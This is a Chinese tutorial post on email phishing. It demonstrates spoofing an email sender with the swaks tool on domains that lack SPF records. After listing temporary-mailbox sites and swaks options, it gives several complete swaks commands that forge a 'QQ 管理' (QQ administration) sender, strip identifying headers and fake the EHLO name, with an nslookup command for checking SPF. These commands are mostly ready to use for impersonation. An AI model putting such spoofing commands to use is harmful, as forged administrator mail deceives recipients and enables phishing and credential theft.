邮件钓鱼--有无SPF演示--Swaks

目录

临时邮箱网址:

[Swaks 简单使用说明:(kali自带)](#Swaks 简单使用说明:(kali自带))

操作流程:

无SPF:(直接伪造发信人)

演示1

演示2

演示3

​编辑

有SPF:--演示


临时邮箱网址:

http://24mail.chacuo.net/

https://www.linshi-email.com/


Swaks 简单使用说明:(kali自带)

-t --to 目标地址 -t [email protected]

-f --from 来源地址 (发件人) -f "text<[email protected]>"

--protocol 设定协议(未测试)

--body "http://www.baidu.com" //引号中的内容即为邮件正文;

--header "Subject:hello" //邮件头信息,subject 为邮件标题

-ehlo 伪造邮件 ehlo 头

--data ./Desktop/email.txt //将 TXT 文件作为邮件发送;


操作流程:

1、检测:

nslookup -type=txt xxx.com

2、伪造:

swaks ...............


无SPF:(直接伪造发信人)

演示1

复制代码
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<[email protected]>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to [email protected]

---直接伪造发信人

演示2

复制代码
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<[email protected]>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to [email protected]

演示3

复制代码
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "QQ 管理<[email protected]>" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to [email protected]

有SPF:--演示

复制代码
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "" --ehlo shabimeiguo -header "Subject: 测试" --body 我们做了一个测试 --to [email protected]

相关推荐
Мартин.6 分钟前
[CISSP] [5] 保护资产安全
数据库·安全·oracle
sszdlbw6 分钟前
BUUCTF-web刷题篇(6)
web安全·web·buuctf
nixiaoge2 小时前
RCE漏洞
网络安全
禾木KG2 小时前
网络安全-等级保护(等保) 1-0 等级保护制度公安部前期发文总结
网络安全
网络抓包与爬虫2 小时前
Wireshark——抓包分析
websocket·网络协议·tcp/ip·http·网络安全·https·udp
zhu12893035563 小时前
网络安全的重要性与防护措施
网络·安全·web安全
仙女很美哦4 小时前
Flutter视频播放、Flutter VideoPlayer 视频播放组件精要
websocket·网络协议·tcp/ip·http·网络安全·https·udp
渗透测试老鸟-九青4 小时前
面试经验分享 | 成都渗透测试工程师二面面经分享
服务器·经验分享·安全·web安全·面试·职场和发展·区块链
网络研究院4 小时前
ChatGPT 的新图像生成器非常擅长伪造收据
网络·人工智能·安全·chatgpt·风险·技术·欺诈
virelin_Y.lin5 小时前
系统与网络安全------Windows系统安全(7)
windows·web安全·系统安全·ftp